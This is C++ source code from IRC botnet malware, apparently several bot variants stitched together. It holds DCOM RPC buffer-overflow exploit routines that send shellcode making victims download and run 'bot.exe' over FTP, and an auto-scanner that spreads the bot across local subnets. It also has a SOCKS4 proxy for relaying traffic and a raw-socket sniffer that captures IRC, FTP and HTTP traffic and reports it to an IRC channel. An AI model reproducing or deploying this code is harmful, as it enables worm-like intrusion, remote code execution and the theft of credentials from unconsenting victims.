bool CScannerDCOM2::Exploit() { char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096]; int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0; char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC); if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false; CString sURL; if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL); memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser) ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 ); iLoadSize=iPos; iPos=0; // Build the request memcpy(szReqBuf+iPos, dcom2_request1, sizeof(dcom2_request1)-1 ); iPos+=sizeof(dcom2_request1)-1; memcpy(szReqBuf+iPos, dcom2_request2, sizeof(dcom2_request2)-1 ); iPos+=sizeof(dcom2_request2)-1; memcpy(szReqBuf+iPos, szLoadBuf, iLoadSize ); iPos+=iLoadSize; memcpy(szReqBuf+iPos, dcom2_request3, sizeof(dcom2_request3)-1 ); iPos+=sizeof(dcom2_request3)-1; memcpy(szReqBuf+iPos, dcom2_request4, sizeof(dcom2_request4)-1 ); iPos+=sizeof(dcom2_request4)-1; iReqSize=iPos; iPos=0; pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12; char szAssocGroup[4]; // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit return false; // Send the bind string if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; } // Check for DCE_PKT_BINDACK if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; } // Store the association group for later usage memcpy(szAssocGroup, szRecvBuf+20, 4); // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; } // Check for DCE_PKT_FAULT if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; } // Close the socket that was once funky fresh m_sSocket.Disconnect(); return true; }
void CScannerAuto::Init() { #ifndef _DEBUG if(g_cMainCtrl.m_cBot.scan_auto.bValue) { char szLocalIp[32]={0}; char szName[255]={0}; unsigned long lLocalIp; CMessage mFakeMsg; int i=0; hostent *hEnt; gethostname(szName, sizeof(szName)); hEnt=gethostbyname(szName); memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); strcpy(szLocalIp, inet_ntoa(to_in_addr(lLocalIp))); mFakeMsg.bNotice=false; mFakeMsg.bSilent=true; mFakeMsg.sChatString.Format(".scan.dcom %s/24 1000000", szLocalIp); mFakeMsg.sCmd.Assign("scan.dcom"); mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue); mFakeMsg.sHost.Assign("AutoScanner.Net"); mFakeMsg.sIdentd.Assign("AutoScanner"); mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue); mFakeMsg.sSrc.Assign("AutoScanner"); for(i=0;i<15;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg); mFakeMsg.sChatString.Format(".scan.dcom %s/16 10000000", szLocalIp); for(i=0;i<25;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg); } #ifdef WIN32 if(g_cMainCtrl.m_cBot.scan_auto_nb.bValue) { char szLocalIp[32]={0}; char szName[255]={0}; unsigned long lLocalIp; CMessage mFakeMsg; int i=0; hostent *hEnt; gethostname(szName, sizeof(szName)); hEnt=gethostbyname(szName); memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); strcpy(szLocalIp, inet_ntoa(to_in_addr(lLocalIp))); mFakeMsg.bNotice=false; mFakeMsg.bSilent=true; mFakeMsg.sChatString.Format(".scan.netbios %s/24 1000000", szLocalIp); mFakeMsg.sCmd.Assign("scan.dcom"); mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue); mFakeMsg.sHost.Assign("AutoScanner.Net"); mFakeMsg.sIdentd.Assign("AutoScanner"); mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue); mFakeMsg.sSrc.Assign("AutoScanner"); for(i=0;i<15;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg); mFakeMsg.sChatString.Format(".scan.netbios %s/16 10000000", szLocalIp); for(i=0;i<25;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg); } #endif // WIN32 #else //#define SCANTEST #ifdef SCANTEST CMessage mFakeMsg; mFakeMsg.bNotice=false; mFakeMsg.bSilent=true; mFakeMsg.sChatString.Format(".scan.dcom2 90.0.1.55/32 100"); mFakeMsg.sCmd.Assign("scan.dcom2"); mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue); mFakeMsg.sHost.Assign("DebugScanner.Net"); mFakeMsg.sIdentd.Assign("DebugScanner"); mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue); mFakeMsg.sSrc.Assign("DebugScanner"); g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg); #endif // SCANTEST #endif // _DEBUG }
void CRedirectSOCKS::StartRedirect() { g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "[%s] Starting Socks4 Proxy on port %d.", \ m_sRedirectName.CStr(), m_iLocalPort); m_sListenSocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(m_sListenSocket==SOCKET_ERROR) return; sockaddr_in ssin, cssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=htons(m_iLocalPort); socklen_t clen=sizeof(cssin); if(bind(m_sListenSocket, (sockaddr*)&ssin, sizeof(ssin))!=0) { xClose(m_sListenSocket); return; } while(m_pRedirect->m_bRedirecting) { if(listen(m_sListenSocket, 10)==SOCKET_ERROR) { Sleep(250); continue; } int sClientSocket=accept(m_sListenSocket, (sockaddr*)&cssin, &clen); #ifdef DBGCONSOLE g_cMainCtrl.m_cConsDbg.Log(1, "CRedirectSOCKS(0x%8.8Xh): Accepted connection from %s...\n", this, inet_ntoa(to_in_addr(cssin.sin_addr.s_addr))); #endif if(sClientSocket!=SOCKET_ERROR && sClientSocket!=0) { CRedirectSOCKS_Thread *pTemp=new CRedirectSOCKS_Thread; pTemp->m_pRedirect=m_pRedirect; pTemp->m_pRedirSOCKS=this; pTemp->m_iLocalPort=m_iLocalPort; pTemp->m_sClientSocket=sClientSocket; pTemp->m_sReplyTo.Assign(m_sReplyTo); pTemp->m_bSilent=m_bSilent; pTemp->m_bNotice=m_bNotice; pTemp->Start(); } else { break; } } if(m_sListenSocket!=INVALID_SOCKET) xClose(m_sListenSocket); g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "[%s] Unloaded proxy on %d.", \ m_sRedirectName.CStr(), m_iLocalPort); }
bool CScannerDCOM::Exploit() { switch(m_sSocket.m_sPort) { case 135: case 1025: { char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096]; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1; char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC); if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB); if(iHostOS==OS_WINNT) return false; CString sURL; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Prepend NOPs as long as shellcode doesn't fit RPC packet format while(iSCSize%16!=12) { char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++; memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; free(szTemp); } // Set the return address if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4); else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4); // Build the request memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1; memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1; memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize; memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1; memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1; iReqSize=iPos; pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12; // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit return false; // Send the bind string if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; } // Read reply m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000); // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; } // Close the socket that was once funky fresh m_sSocket.Disconnect(); return true; } break; case 445: { #ifdef _WIN32 NETRESOURCEW nr; bool bRetVal=false; if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal; else { int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP); if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB); char szPipePath[MAX_PATH]; sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost); HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \ NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(hFile!=INVALID_HANDLE_VALUE) { SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost); char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096]; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1; char *pTemp; CString sURL; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Prepend NOPs as long as shellcode doesn't fit RPC packet format while(iSCSize%16!=12) { char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++; memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; free(szTemp); } // Set the return address if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4); else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4); // Build the request memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1; memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1; memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize; memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1; memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1; iReqSize=iPos; pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12; unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000); // Send the bind string DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL); if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; } // Send the evil request if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; } if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false; free(szInBuf); } CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); } return bRetVal; #endif // _WIN32 } break; default: return false; break; } return false; }
DWORD WINAPI SnifferThread(LPVOID param) { SNIFFER sniff = *((SNIFFER *)param); SNIFFER *sniffs = (SNIFFER *)param; sniffs->gotinfo = TRUE; char sendbuf[IRCLINE]; int sock; sockaddr_in addr_in; hostent *hEnt; IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; char szName[255]={0}; unsigned long lLocalIp; addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); addr_in.sin_addr.s_addr=lLocalIp; sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); if(sock==INVALID_SOCKET) return NULL; if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } int optval=1; DWORD dwBytesRet; if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; while(1) { // Clear the buffer memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; // Read the raw packet iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); // Process if its a TCP/IP packet if(ipHeader->proto==6) { tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25) { sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); for(int i=0; i<(int)strlen(szPacket); i++) { if(szPacket[i]=='\r') szPacket[i]='\x20'; if(szPacket[i]=='\n') szPacket[i]='\x20'; } if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousHTTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousVULN(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } } } } fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); return 0; }